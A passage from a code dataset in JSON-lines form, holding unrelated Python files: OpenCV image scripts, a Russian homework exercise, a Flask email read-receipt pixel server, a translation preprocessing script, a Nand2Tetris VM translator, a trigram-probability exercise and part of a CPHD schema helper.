0xFF\n\n # if the 'r' key is pressed, reset the cropping region\n if key == ord(\"r\"):\n image = clone.copy()\n\n # if the 'c' key is pressed, break from the loop\n elif key == ord(\"c\"):\n break\n \n # if the 'q' key is pressed, exit\n elif key == ord(\"q\"):\n sys.exit(\"Exiting...\")\n\n# if there are two reference points, then crop the region of interest\nif len(ref_point) == 2:\n crop_img = clone[ref_point[0][1]:ref_point[1][1], ref_point[0][0]:ref_point[1][0]]\nelse:\n crop_img = clone\n\n","sub_path":"[CV] Rust Detection in OpenCV/selecter.py","file_name":"selecter.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"581347665","text":"#!/usr/bin/env python\n\nimport re\n\n\"\"\"\nНеобходимо создать (не программно) текстовый файл, где каждая строка описывает учебный предмет и наличие лекционных,\nпрактических и лабораторных занятий по этому предмету и их количество. Важно, чтобы для каждого предмета не обязательно\nбыли все типы занятий. Сформировать словарь, содержащий название предмета и общее количество занятий по нему.\nВывести словарь на экран.\n\nПримеры строк файла:\nИнформатика: 100(л) 50(пр) 20(лаб).\nФизика: 30(л) — 10(лаб)\nФизкультура: — 30(пр) —\n\nПример словаря:\n{“Информатика”: 170, “Физика”: 40, “Физкультура”: 30}\n\"\"\"\n\nTEXT_FILE = \"task06.txt\"\n\n\ndef init_file(file_name):\n with open(file_name, \"w\") as t_file:\n while True:\n var = input(\"Enter a string (example: 'Информатика: 100(л) 50(пр) 20(лаб)'; leave empty to exit):\\n\")\n if var:\n print(var, file=t_file)\n else:\n print(\"Empty string. Stop reading input.\")\n break\n\n\ndef calculate_statistic(file_name):\n statistics_dict = {}\n try:\n with open(file_name, \"r\") as t_file:\n for line in t_file:\n chunks = re.sub(\"\\([^0-9]{1,}\\)|([:.,—-])\", \"\", line.strip()).split()\n course_name = chunks[0]\n course_hours = sum([int(chunks[i]) for i in range(1, len(chunks))])\n statistics_dict.update({\n course_name: course_hours\n })\n print(\"Statistic for courses:\")\n print(statistics_dict)\n except FileNotFoundError:\n print(f\"File '{TEXT_FILE}' not found\")\n exit(1)\n\n\ndef main():\n init_file(TEXT_FILE)\n calculate_statistic(TEXT_FILE)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lesson-5/task06.py","file_name":"task06.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"642021213","text":"from flask import (\n Flask,\n send_file,\n g,\n render_template,\n request,\n make_response\n)\nimport sqlite3\nimport uuid\nfrom datetime import timezone, datetime\nfrom typing import Union\n\nhostname = 'http://127.0.0.1:5000'\n\napp = Flask(__name__)\n\ndef gen_link(db, email: str):\n id = uuid.uuid4().hex\n db.execute(\n 'insert into links (id, email, when_read, was_read, is_active) values (?, ?, ?, ?, ?)',\n (id, email, '', 0, 0)\n )\n db.commit()\n return id\n\ndef is_valid(db, id: str):\n cursor = db.execute('select * from links where id = ?', (id,))\n return len(cursor.fetchall()) != 0\n\ndef access(db, id: str):\n if is_valid(db, id):\n db.execute(\n 'update links set when_read = ?, was_read = 1, is_active = 0 where id = ?',\n (datetime.now(timezone.utc).isoformat(), id)\n )\n db.commit()\n\ndef to_link(path, id):\n return f'{hostname}/{path}/{id}'\n\ndef del_link(db, id: str):\n db.execute('delete from links where id = ?', (id,))\n db.commit()\n\n# def status_of(db, id: str) -> str:\n# res = db.execute('select * from links where id = ?', (id,)).fetchone()\n# return res.when_read if res.was_read == 1 else None\n\ndef is_active(db, id: str) -> bool:\n row = db.execute('select * from links where id = ?', (id,)).fetchone()\n if row is None:\n return False\n return row['is_active'] == 1\n\n@app.route('/verification/', methods=['GET'])\ndef verify(id):\n db = get_db()\n if is_valid(db, id):\n if is_active(db, id):\n access(db, id)\n res = make_response(send_file('./img/1px.png', mimetype='image/png'))\n res.headers['Content-Type'] = 'image/png'\n res.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, max-age=0'\n res.headers['Pragma'] = 'no-cache'\n return res\n print('invalid id')\n return render_template('error.html', error=f\"wrong id: {id}\")\n\n@app.route('/gen', methods=['GET'])\ndef gen_page():\n return app.send_static_file('gen.html')\n\n@app.route('/gen', methods=['POST'])\ndef gen():\n email = request.form.get('email', None)\n if email is None:\n return render_template('error.html', error=\"no email provided in request\")\n id = gen_link(get_db(), email)\n return render_template(\n 'gen.html',\n statuslink=to_link('status', id), \n email=email,\n link=to_link('verification', id)\n )\n\n@app.route('/activate', methods=['POST'])\ndef activate():\n id = request.form.get('id', None)\n db = get_db()\n if id is not None:\n db.execute('update links set is_active = 1 where id = ?', (id,))\n db.commit()\n return render_template('activate.html', id=id)\n return render_template('error.html', error=\"no id provided in request\")\n \n\n@app.route('/status/')\ndef status(id):\n row = get_db().execute('select * from links where id = ?', (id,)).fetchone()\n if row is None:\n return render_template('error.html', error=f\"no link with id \\\"{id}\\\" found\")\n return render_template(\n 'status.html',\n email=row['email'],\n was_read=('Yes' if row['was_read'] == 1 else 'No'),\n is_active=('Yes' if row['is_active'] == 1 else 'No'),\n when_read=row['when_read'],\n id=id,\n link=to_link('verification', id)\n )\n\n@app.route('/del', methods=['POST'])\ndef delete():\n id = request.form.get('id', None)\n if id is None:\n return render_template('error.html', error=\"no id provided in request\")\n del_link(get_db(), id)\n return render_template('del.html', id=id)\n\ndef close_db(e=None):\n db = g.pop('db', None)\n if db is not None:\n db.close()\n\ndef get_db():\n if 'db' not in g:\n g.db = sqlite3.connect(\n './links.db',\n detect_types=sqlite3.PARSE_DECLTYPES\n )\n g.db.row_factory = sqlite3.Row\n return g.db\n\n###############\n\ndef main():\n app.run()\n close_db()\n\nif __name__=='__main__':\n main()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"352415587","text":"import os\nimport yaml\nimport numpy as np\nimport pickle\nfrom fastdata.vocab import Vocab\nfrom fastdata.tokenizer import fair_tokenizer, nltk_tokenizer, spacy_en_tokenizer, spacy_de_tokenizer\nfrom fastdata.utils import text_file2word_lists, word_lists2numpy\n\nconfig = yaml.load(open('config.yml'))['data_process']\n\nif config['tokenizer'] == 'fair':\n src_tokenizer = fair_tokenizer\n trg_tokenizer = fair_tokenizer\nelif config['tokenizer'] == 'nltk':\n src_tokenizer = nltk_tokenizer\n trg_tokenizer = nltk_tokenizer\nelif config['tokenizer'] == 'spacy':\n src_tokenizer = spacy_de_tokenizer\n trg_tokenizer = spacy_en_tokenizer\nelse:\n raise ValueError('No supporting.')\n\nsrc_train_text = open(config['path']['raw']['src_train'], 'r', encoding='utf-8')\ntrg_train_text = open(config['path']['raw']['trg_train'], 'r', encoding='utf-8')\nsrc_val_text = open(config['path']['raw']['src_val'], 'r', encoding='utf-8')\ntrg_val_text = open(config['path']['raw']['trg_val'], 'r', encoding='utf-8')\nsrc_test_text = open(config['path']['raw']['src_test'], 'r', encoding='utf-8')\ntrg_test_text = open(config['path']['raw']['trg_test'], 'r', encoding='utf-8')\n\nsrc_train_word_lists = text_file2word_lists(src_train_text, src_tokenizer)\ntrg_train_word_lists = text_file2word_lists(trg_train_text, trg_tokenizer)\nsrc_val_word_lists = text_file2word_lists(src_val_text, src_tokenizer)\ntrg_val_word_lists = text_file2word_lists(trg_val_text, trg_tokenizer)\nsrc_test_word_lists = text_file2word_lists(src_test_text, src_tokenizer)\ntrg_test_word_lists = text_file2word_lists(trg_test_text, trg_tokenizer)\n\nsrc_vocab = Vocab()\ntrg_vocab = Vocab()\n\nfor word_list in src_train_word_lists:\n src_vocab.add_list(word_list)\nfor word_list in trg_train_word_lists:\n trg_vocab.add_list(word_list)\n\nsrc_word2index, src_index2word = src_vocab.get_vocab(\n max_size=config['vocab']['src']['max_size'],\n min_freq=config['vocab']['src']['min_freq']\n)\ntrg_word2index, trg_index2word = trg_vocab.get_vocab(\n max_size=config['vocab']['trg']['max_size'],\n min_freq=config['vocab']['trg']['min_freq']\n)\n\nsrc_train = word_lists2numpy(src_train_word_lists, src_word2index)\ntrg_train = word_lists2numpy(trg_train_word_lists, trg_word2index)\nsrc_val = word_lists2numpy(src_val_word_lists, src_word2index)\ntrg_val = word_lists2numpy(trg_val_word_lists, trg_word2index)\nsrc_test = word_lists2numpy(src_test_word_lists, src_word2index)\ntrg_test = word_lists2numpy(trg_test_word_lists, trg_word2index)\n\nif not os.path.exists(os.path.dirname(config['path']['processed']['train'])):\n os.makedirs(os.path.dirname(config['path']['processed']['train']))\n\nnp.savez(config['path']['processed']['train'], src=src_train, trg=trg_train)\nnp.savez(config['path']['processed']['val'], src=src_val, trg=trg_val)\nnp.savez(config['path']['processed']['test'], src=src_test, trg=trg_test)\n\nwith open(config['path']['processed']['src_word2index'], 'wb') as handle:\n pickle.dump(src_word2index, handle)\nwith open(config['path']['processed']['src_index2word'], 'wb') as handle:\n pickle.dump(src_index2word, handle)\nwith open(config['path']['processed']['trg_word2index'], 'wb') as handle:\n pickle.dump(trg_word2index, handle)\nwith open(config['path']['processed']['trg_index2word'], 'wb') as handle:\n pickle.dump(trg_index2word, handle)","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"493434729","text":"import cv2\nimport numpy as np\n\noriginal_img = cv2.imread(\"11.jpg\", 0)\n\n\nimg1 = cv2.GaussianBlur(original_img, (3, 3), 0)\ncanny = cv2.Canny(img1, 50, 150)\n\n\n_, Thr_img = cv2.threshold(original_img, 210, 255, cv2.THRESH_BINARY)\nkernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\ngradient = cv2.morphologyEx(Thr_img, cv2.MORPH_GRADIENT, kernel)\n\n#cv2.imshow(\"original_img\", original_img)\ncv2.imshow(\"gradient\", gradient)\n#cv2.imshow('Canny', canny)\ncv2.imwrite(\"bowl1.jpg\", gradient)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"canny.py","file_name":"canny.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"35838982","text":"# VMtranslator.py\n# Translates code written in VM intermediate language (as defined in the course\n# guidelines) into the Hack Assembly language\n# Author: Alon Aviv (alonav11)\n# Written for the course \"From NAND to Tetris\" - 5/2016\n\nimport os\nimport sys\n\npointer_address = 3\ntemp_address = 5\n\ncomparison_counter = 0\nfunction_counter = 0\n# labels, by function instead of by number? Pay attention that these labels\n# can't be naive - as they might be assigned by someone else\n\n\ndef parse(line):\n \"\"\"\n parses a given VM line and extracts the type of command and\n relevant parameters.\n :param line: String consisting of a single line of VM code\n :return: Tuple of (operand_type, [arg1], [arg2]. Returns nothing if line\n is empty or unidentified.\n \"\"\"\n # Removing comments\n line = line.split('//', 1)[0]\n line = \" \".join(line.split())\n words = line.split(' ')\n\n if words[0] in ('add', 'sub', 'eq', 'gt', 'lt', 'and', 'or',\n 'not', 'neg'):\n return 'C_BINARY_ARITHMETIC', words[0]\n\n if words[0] == 'push':\n return 'C_PUSH', words[1], words[2]\n\n if words[0] == 'pop':\n return 'C_POP', words[1], words[2]\n\n if words[0] == 'label':\n return 'C_LABEL', words[1]\n\n if words[0] == 'goto':\n return 'C_GOTO', words[1]\n\n if words[0] == 'if-goto':\n return 'C_IF', words[1]\n\n if words[0] == 'function':\n return 'C_FUNCTION', words[1], words[2]\n\n if words[0] == 'call':\n return 'C_CALL', words[1], words[2]\n\n if words[0] == 'return':\n return 'C_RETURN',\n\n # If line is empty\n return False\n\n\ndef translate_push_pop(action, segment, value, file_name):\n \"\"\"\n :param action: C_PUSH or C_POP according to relevant command\n :param segment: Segment to push and pop from/to\n :param value: Value after segment. Stands for index or static symbol\n :param file_name: Name of file being proceed\n :return: Tuple of assembly lines performing given operation\n \"\"\"\n\n # 'pointer' refers to physical address 3 + value\n if segment == 'pointer':\n return translate_physical_push_pop(action, str(pointer_address+int(\n value)))+('\\n',)\n\n # 'temp' refers to physical address 5 + value\n if segment == 'temp':\n return translate_physical_push_pop(action, str(temp_address+int(\n value)))+('\\n',)\n\n # 'static refers to actual RAM location denoted by symbol given in\n # 'value' field. Actual RAM location is assigned by hack assembler.\n # Symbol is prepended by the name of the file\n if segment == 'static':\n return translate_physical_push_pop(action, file_name + '.'+value)+(\n '\\n',)\n\n # If segment isn't a physical address - it's a constant or an address to\n # a cell holding an address (which is what the boolean below is\n # referring to)\n is_address = True\n\n # Assembly commands for storing address or constant into register D\n load_value_into_d_commands = None\n\n if segment == 'constant':\n is_address = False\n # loading value of index into D\n load_value_into_d_commands = ('@'+value, 'D=A')\n\n else:\n # loading into D the address denoted by given segment and index\n load_value_into_d_commands = ('@'+value, 'D=A',\n '@'+convert_segments(segment),\n 'D=M+D')\n\n # performing pop action using register R15 to temporarily store target\n # address.\n if action == 'C_POP':\n\n assert is_address\n\n return ('//pop '+segment+' '+value+' operation',\n ) + load_value_into_d_commands + ('@R15', 'M=D', '@SP',\n 'M=M-1', 'A=M', 'D=M',\n '@R15', 'A=M', 'M=D', '\\n')\n\n # performing push to value stored in D. If segment is an address,\n # loading the contents of said address to D first\n if action == 'C_PUSH':\n commands = ('//push '+segment+' '+value+' operation',\n ) + load_value_into_d_commands\n if is_address:\n commands += ('A=D', 'D=M')\n commands += ('@SP', 'A=M', 'M=D', '@SP', 'M=M+1', '\\n')\n return commands\n\n\ndef translate_physical_push_pop(action, physical_address):\n \"\"\"\n :param action: C_PUSH or C_POP, according to requested operation\n :param physical_address: Physical address of the hack computers RAM\n (not accessible to VM - used for internal implementation\n :return: Tuple of assembly lines performing push or pop on top stack\n item, using given physical address\n \"\"\"\n assert action == 'C_PUSH' or action == 'C_POP'\n if action == 'C_POP':\n return '//pop into physical address '+physical_address, '@SP', \\\n 'M=M-1', 'A=M', 'D=M', '@'+physical_address, 'M=D',\n elif action == 'C_PUSH':\n return '//push from physical address '+physical_address, \\\n '@'+physical_address, 'D=M', '@SP', 'A=M', 'M=D', '@SP', \\\n 'M=M+1',\n\n\ndef convert_segments(segment):\n \"\"\"\n :param segment: Segment section of push/pop command\n :return: Name of address that segment points to in assembly keywords (\n e.g. 'local' -> 'LCL'\n \"\"\"\n assert segment in ('local', 'argument', 'this', 'that')\n\n if segment == 'local':\n return 'LCL'\n elif segment == 'argument':\n return 'ARG'\n elif segment == 'this':\n return 'THIS'\n elif segment == 'that':\n return 'THAT'\n\n\ndef translate_arithmetic(operand):\n \"\"\"\n :param operand: Arithmetic operand (single word) to be translated into\n assembly\n :return: Tuple of assembly lines performing given operation\n \"\"\"\n assert operand in ('add', 'sub', 'eq', 'gt', 'lt', 'and', 'or',\n 'not', 'neg')\n\n is_comparison = False\n is_unary = False\n\n # Line that performs specific arithmetic in each case\n arithmetic_command_line = None\n final_code = ('// '+operand+' operation',)\n\n if operand == 'add':\n arithmetic_command_line = 'D=D+M'\n\n elif operand == 'sub':\n arithmetic_command_line = 'D=D-M'\n\n elif operand == 'and':\n arithmetic_command_line = 'D=D&M'\n\n elif operand == 'or':\n arithmetic_command_line = 'D=D|M'\n\n elif operand == 'eq':\n arithmetic_command_line = 'JEQ'\n is_comparison = True\n\n elif operand == 'gt':\n arithmetic_command_line = 'JGT'\n is_comparison = True\n\n elif operand == 'lt':\n arithmetic_command_line = 'JLT'\n is_comparison = True\n\n elif operand == 'neg':\n arithmetic_command_line = 'D=-M'\n is_unary = True\n\n elif operand == 'not':\n arithmetic_command_line = 'D=!M'\n is_unary = True\n\n # In case of comparison - pop two top items from stack into multi\n # purpose registers R13, R14. Then perform comparison on both registers\n # and save result in register D. Realized using assembly labels.\n if is_comparison:\n global comparison_counter\n counter = str(comparison_counter)\n final_code += translate_physical_push_pop('C_POP', 'R14')\n final_code += translate_physical_push_pop('C_POP', 'R13')\n final_code += ('@R13', 'D=M', '@R14', 'D=D-M', '@TRUE_' + counter,\n 'D;'+arithmetic_command_line, '@0', 'D=A',\n '@CONT_'+counter, '0;JMP', '(TRUE_'+counter+')',\n '@1', 'D=-A', '(CONT_'+counter+')'\n )\n comparison_counter += 1\n\n # In case of unary operation - pop one item into multi purpose resister\n # R13, perform relevant operation and save result into register D.\n elif is_unary:\n final_code += translate_physical_push_pop('C_POP', 'R13')\n final_code += ('@R13', arithmetic_command_line)\n\n # In case of binary operation - pop two top items from stack into multi\n # purpose registers R13, R14. Perform operation on both registers and\n # save result in register D.\n\n else:\n final_code += translate_physical_push_pop('C_POP', 'R14')\n final_code += translate_physical_push_pop('C_POP', 'R13')\n final_code += ('@13', 'D=M', '@14', arithmetic_command_line)\n\n # push result stored in register D back into stack\n final_code += ('@SP', 'A=M', 'M=D', '@SP', 'M=M+1', '\\n')\n\n return final_code\n\n\ndef translate_label(label, current_function):\n \"\"\"\n Translates the label VM command to assembly. Label is named in assembly\n according to the following convention: \"function_name$label\"\n :param label: Name of label\n :param current_function: Name of current function\n :return: Tuple containing relevant assembly code\n \"\"\"\n # if function name is empty, no $ sign is added.\n prefix = current_function+'$' if current_function else \"\"\n return '(' + prefix + label + ')',\n\n\ndef translate_goto(label, current_function):\n \"\"\"\n Translates the VM goto command to assembly. Uses the convention:\n \"function_name$label\"\n :param label: Name of label to go to\n :param current_function: Name of function to which the command belongs\n :return: Tuple containing relevant assembly code\n \"\"\"\n # if function name is empty, no $ sign is added.\n prefix = current_function+'$' if current_function else \"\"\n return '@' + prefix + label, '0;JMP', '\\n'\n\n\ndef translate_if(label, current_function):\n \"\"\"\n Translates the VM if-goto command to assembly. Pops the top item in\n the stack. If value is not zero, jumps to given label. Uses the convention:\n \"function_name$label\"\n :param label: Name of label to go to\n :param current_function: Name of function to which the command belongs\n :return: Tuple containing relevant assembly code\n \"\"\"\n # if function name is empty, no $ sign is added.\n prefix = current_function+'$' if current_function else \"\"\n\n return '//if-goto '+label, '@SP', 'M=M-1', 'A=M', 'D=M', \\\n '@'+prefix+label, 'D;JNE', '\\n'\n\n\ndef translate_call(function, arg_num):\n \"\"\"\n Translates into assembly the VM call command. Loads all necessary\n commands into the global stack and passes control to called function\n :param function: Name of function being called\n :param arg_num: Number of arguments function accepts\n :return: Tuple containing relevant assembly code\n \"\"\"\n\n global function_counter\n return_label = function + '_RETURN_' + str(function_counter)\n function_counter += 1\n return ('//CALLING FUNCTION '+function, '@'+return_label,\n 'D=A', '@SP', 'A=M', 'M=D', '@SP', 'M=M+1') + \\\n translate_physical_push_pop('C_PUSH', 'LCL') + \\\n translate_physical_push_pop('C_PUSH', 'ARG') + \\\n translate_physical_push_pop('C_PUSH', 'THIS') + \\\n translate_physical_push_pop('C_PUSH', 'THAT') + \\\n translate_physical_push_pop('C_PUSH', 'SP') +\\\n translate_push_pop('C_PUSH', 'constant', arg_num, None)[:-1] + \\\n translate_arithmetic('sub')[:-1] + \\\n translate_push_pop('C_PUSH', 'constant', '5', None)[:-1] + \\\n translate_arithmetic('sub')[:-1] + translate_physical_push_pop(\n 'C_POP', 'ARG') + \\\n translate_physical_push_pop('C_PUSH', 'SP') + \\\n translate_physical_push_pop('C_POP', 'LCL') + ('@'+function,\n '0;JMP',\n '('+return_label+')',\n '\\n')\n\n\ndef translate_function_definition(function, local_variables):\n \"\"\"\n Translates into assembly the VM function definition command. Pushes into\n the stack the relevant number of local variables, initialized to 0.\n :param function: Function name\n :param local_variables: Number of local variables\n :return: Tuple containing relevant assembly code\n \"\"\"\n\n loop_start_label = function + '_DEF_LOOP_START'\n loop_end_label = function + '_DEF_LOOP_END'\n\n return ('//Defining function '+function, '('+function+')', '@0', 'D=A',\n '@R15', 'M=D', '('+loop_start_label+')', '@R15',\n 'D=M', '@'+local_variables, 'D=D-A', '@'+loop_end_label,\n 'D;JGE', '@0', 'D=A', '@SP', 'A=M', 'M=D', '@SP', 'M=M+1',\n '@R15', 'M=M+1', '@'+loop_start_label, '0;JMP',\n '('+loop_end_label+')', '\\n')\n\n\ndef translate_return():\n \"\"\"\n Translates the VM return instruction into assembly. Adds return value to\n stack, removes all other items from stack, restore's caller's state and\n returns control to caller.\n :return: Tuple containing relevant assembly code\n \"\"\"\n return ('//Returning from function', '@ARG', 'D=M', '@R13', 'M=D', '@LCL',\n 'D=M-1', '@R15', 'M=D', 'A=D', 'D=M', '@THAT', 'M=D', '@R15',\n 'M=M-1', 'D=M', 'A=D', 'D=M', '@THIS', 'M=D', '@R15', 'M=M-1',\n 'D=M', 'A=D', 'D=M', '@ARG', 'M=D', '@R15', 'M=M-1', 'D=M', 'A=D',\n 'D=M', '@LCL', 'M=D', '@R15', 'M=M-1', 'D=M', 'A=D', 'D=M',\n '@R14', 'M=D', '@SP', 'D=M-1', 'A=D', 'D=M', '@R13', 'A=M',\n 'M=D', '@R13', 'D=M', '@SP', 'M=D+1', '@R14', 'A=M', '0;JMP',\n '\\n')\n\n\ndef add_bootstrap():\n \"\"\"\n :return: Tuple of assembly code designated to initialize the program.\n Sets the stack pointer to be 256 and calls the function Sys.init\n \"\"\"\n return ('//Bootstrap code', '@256', 'D=A', '@SP', 'M=D') + \\\n translate_call('Sys.init', '0')\n\n\ndef add_slash(string):\n \"\"\"\n :param string: Any string\n :return: The given string with an added '/' character at the end,\n in case it didn't already have that character at the end\n \"\"\"\n return string+'/' if not string.endswith('/') else string\n\n\ndef remove_slash(string):\n \"\"\"\n :param string: Any string\n :return: The given string with the '/' character removed from the end,\n if that string finished with '/' to begin with\n \"\"\"\n\n return string[0] if string.endswith('/') else string\n\n\ndef translate_file(file_path, output_file):\n \"\"\"\n :param file_path: VM file to translate to assembly\n :param output_file: Target file to write translation to\n \"\"\"\n with open(file_path, 'r') as VM_file:\n current_function = \"\"\n for line in VM_file:\n parsed_line = parse(line)\n # Empty lines (valued as false) are ignored\n if parsed_line:\n if parsed_line[0] == 'C_FUNCTION':\n current_function = parsed_line[1]\n\n output_file.writelines(line + '\\n' for line in\n translate_line(parsed_line,\n current_function,\n file_path))\n\n\ndef translate_line(line_tuple, current_function, file_path):\n \"\"\"\n :param line_tuple: Tuple representing a VM line in the form of\n (command_type, [arg1], [arg2])\n :param current_function: Name of function which line is nested in. If empty\n string, line appears in global namespace\n :param file_path: Path of file where line is written\n :return: Translation of line into tuple of assembly lines\n \"\"\"\n if line_tuple[0] == 'C_BINARY_ARITHMETIC':\n return translate_arithmetic(line_tuple[1])\n\n if line_tuple[0] in ('C_PUSH', 'C_POP'):\n return translate_push_pop(line_tuple[0], line_tuple[1], line_tuple[\n 2], os.path.basename(file_path).split('.')[0])\n\n if line_tuple[0] == 'C_LABEL':\n return translate_label(line_tuple[1], current_function)\n\n if line_tuple[0] == 'C_GOTO':\n return translate_goto(line_tuple[1], current_function)\n\n if line_tuple[0] == 'C_IF':\n return translate_if(line_tuple[1], current_function)\n\n if line_tuple[0] == 'C_CALL':\n return translate_call(line_tuple[1], line_tuple[2])\n\n if line_tuple[0] == 'C_FUNCTION':\n return translate_function_definition(line_tuple[1], line_tuple[2])\n\n if line_tuple[0] == 'C_RETURN':\n return translate_return()\n\n # function must return lines\n assert False\n\n\ndef main():\n path = sys.argv[1]\n if os.path.isfile(path):\n with open(path.split('.')[0] + '.asm', 'w') as output_file:\n # Adding bootstrap code at start of file\n output_file.writelines(line + '\\n' for line in add_bootstrap())\n translate_file(path, output_file)\n\n elif os.path.isdir(path):\n dir_name = os.path.basename(path)\n path = add_slash(path)\n with open(path+dir_name+'.asm', 'w') as output_file:\n # Adding bootstrap code at start of file\n output_file.writelines(line + '\\n' for line in add_bootstrap())\n for file in os.listdir(path):\n if file.endswith('.vm'):\n translate_file(os.path.join(path, file), output_file)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"project8.py","file_name":"project8.py","file_ext":"py","file_size_in_byte":16871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47549927","text":"import re\nimport operator\nfrom math import log, exp\n\n################# Question 1 #################\n# note that we can do without nltk.word_tokenize in this question\ninf = open('Lovers_on_Aran_messed.txt', 'r')\nouf = open('Lovers_on_Aran.txt', 'w')\nfor line in inf:\n\tif not re.match(pattern='^\\s+$', string=line): # retain only non-empty lines\n\t\tline = re.sub('\\s+', ' ', line) # replace succesive spaces with 1 space\n\t\tline = re.sub('\\s*(?P[!\\?\\.,])\\s*', ' \\g ', line) # add spaces around punctuations\n\t\touf.write(line.strip()+'\\n')\ninf.close()\nouf.close()\n\n################# Question 2 #################\ninf = open('Lovers_on_Aran.txt', 'r')\nouf = open('count_and_find.txt', 'w')\ncount = 0\ntgt_words = [] # target words\nfor line in inf:\n\tfor w in line.split():\n\t\tcount += 1\n\t\tif re.match(r'[A-Z]', w) or len(w) < 3:\n\t\t\ttgt_words.append(w)\nouf.write(str(count)+'\\n')\nfor w in tgt_words:\n\touf.write(w+'\\n')\ninf.close()\nouf.close()\n\n################# Question 3 #################\ninf = open('Lovers_on_Aran.txt', 'r')\nouf = open('trigram_prob.txt', 'w')\nsents = []\nfor line in inf:\n\tpadded_sent = ' ' * 2 + line + ' <\\s>' * 2\n\tsplit_sent = padded_sent.lower().split()\n\tsents.append(split_sent)\n\ntri_dict = {} # a dict of trigram probs, with structure: {'w1w2':{'w3':prob, ...}, ...}\nfor sent in sents:\n\tfor i in range(0, len(sent) - 2):\n\t\tw1w2 = sent[i] + ' ' + sent[i+1]\n\t\tif w1w2 not in tri_dict:\n\t\t\ttri_dict[w1w2] = {}\n\t\tw3 = sent[i+2]\n\t\tif w3 not in tri_dict[w1w2]:\n\t\t\ttri_dict[w1w2][w3] = 0\n\t\ttri_dict[w1w2][w3] += 1\ntri_dict = {w1w2: {w3: count / sum(tri_dict[w1w2].values()) for w3, count in tri_dict[w1w2].items()} for w1w2 in tri_dict}\n\nsent_prob = {} # a dict of sentence probabilities, with structure: {lineID:prob, ...}\nfor i, sent in enumerate(sents):\n\tsent_prob[i] = round(exp(sum([log(tri_dict[sent[j]+' '+sent[j+1]][sent[j+2]]) for j in range(0, len(sent) - 2)])), 3) # use log probs\nsorted_sent_prob = sorted(sent_prob.items(), key=operator.itemgetter(1), reverse=True)\nfor id, prob in sorted_sent_prob:\n\touf.write('{}: {}\\n'.format(id, prob))","sub_path":"practical_session/prac5/prac5.py","file_name":"prac5.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"344971269","text":"\"\"\"\nThis package contains the CPHD schema\n\"\"\"\n\n__classification__ = 'UNCLASSIFIED'\n__author__ = \"Thomas McCullough\"\n\nimport os\nimport re\nfrom typing import List, Dict, Tuple, Union\n\n\n_CPHD_DEFAULT_TUPLE = (1, 1, 0)\n\n_the_directory = os.path.split(__file__)[0]\n\nurn_mapping = {\n 'urn:CPHD:0.3.0': {\n 'tuple': (0, 3, 0),\n 'version': '0.3.0',\n 'release': '0.3.0',\n 'date': ''},\n 'urn:CPHD:1.0.1': {\n 'tuple': (1, 0, 1),\n 'version': '1.0.1',\n 'release': '1.0.1',\n 'date': '2018-05-21T00:00:00Z',\n 'schema': os.path.join(_the_directory, 'CPHD_schema_V1.0.1_2018_05_21.xsd')},\n 'urn:CPHD:1.1.0': {\n 'tuple': (1, 1, 0),\n 'version': '1.1.0',\n 'release': '1.1.0',\n 'date': '2021-11-30T00:00:00Z',\n 'schema': os.path.join(_the_directory, 'CPHD_schema_V1.1.0_2021_11_30_FINAL.xsd')},\n}\nWRITABLE_VERSIONS = ('1.0.1', '1.1.0')\n\n# validate the defined paths\nfor key, entry in urn_mapping.items():\n schema_path = entry.get('schema', None)\n if schema_path is not None and not os.path.exists(schema_path):\n raise ValueError('`{}` has nonexistent schema path {}'.format(key, schema_path))\n\n\ndef get_default_tuple() -> Tuple[int, int, int]:\n \"\"\"\n Get the default CPHD version tuple.\n\n Returns\n -------\n Tuple[int, int, int]\n \"\"\"\n\n return _CPHD_DEFAULT_TUPLE\n\n\ndef get_default_version_string() -> str:\n \"\"\"\n Get the default CPHD version string.\n\n Returns\n -------\n str\n \"\"\"\n\n return '{}.{}.{}'.format(*_CPHD_DEFAULT_TUPLE)\n\n\ndef get_namespace(version: Union[str, Tuple[int, int, int]]) -> str:\n if isinstance(version, (list, tuple)):\n version = '{}.{}.{}'.format(version[0], version[1], version[2])\n return 'http://api.nsgreg.nga.mil/schema/cphd/{}'.format(version)\n\n\ndef check_urn(urn_string: str) -> str:\n \"\"\"\n Checks that the urn string follows the correct pattern.\n\n Parameters\n ----------\n urn_string : str\n\n Raises\n ------\n ValueError\n This raises an exception for a poorly formed or unmapped CPHD urn.\n \"\"\"\n\n if not isinstance(urn_string, str):\n raise TypeError(\n 'Expected a urn input of string type, got type {}'.format(type(urn_string)))\n\n the_match = re.match(r'^\\d.\\d.\\d$', urn_string)\n if the_match is not None:\n urn_string = 'urn:CPHD:{}'.format(urn_string)\n\n the_match = re.match(r'^urn:CPHD:\\d.\\d.\\d$', urn_string)\n if the_match is None:\n raise ValueError(\n 'Input provided as `{}`,\\nbut should be of the form '\n '`urn:CPHD:..'.format(urn_string))\n return urn_string\n\n\ndef get_urn_details(urn_string: str) -> Dict[str, str]:\n \"\"\"\n Gets the associated details for the given CPHD urn, or raise an exception for\n poorly formatted or unrecognized urn.\n\n Parameters\n ----------\n urn_string : str\n\n Returns\n -------\n Dict[str, str]\n \"\"\"\n\n urn_string = check_urn(urn_string)\n out = urn_mapping.get(urn_string, None)\n\n if out is None:\n raise KeyError(\n 'Got correctly formatted, but unmapped CPHD urn {}.'.format(urn_string))\n return out\n\n\ndef get_schema_path(the_urn: str) -> str:\n 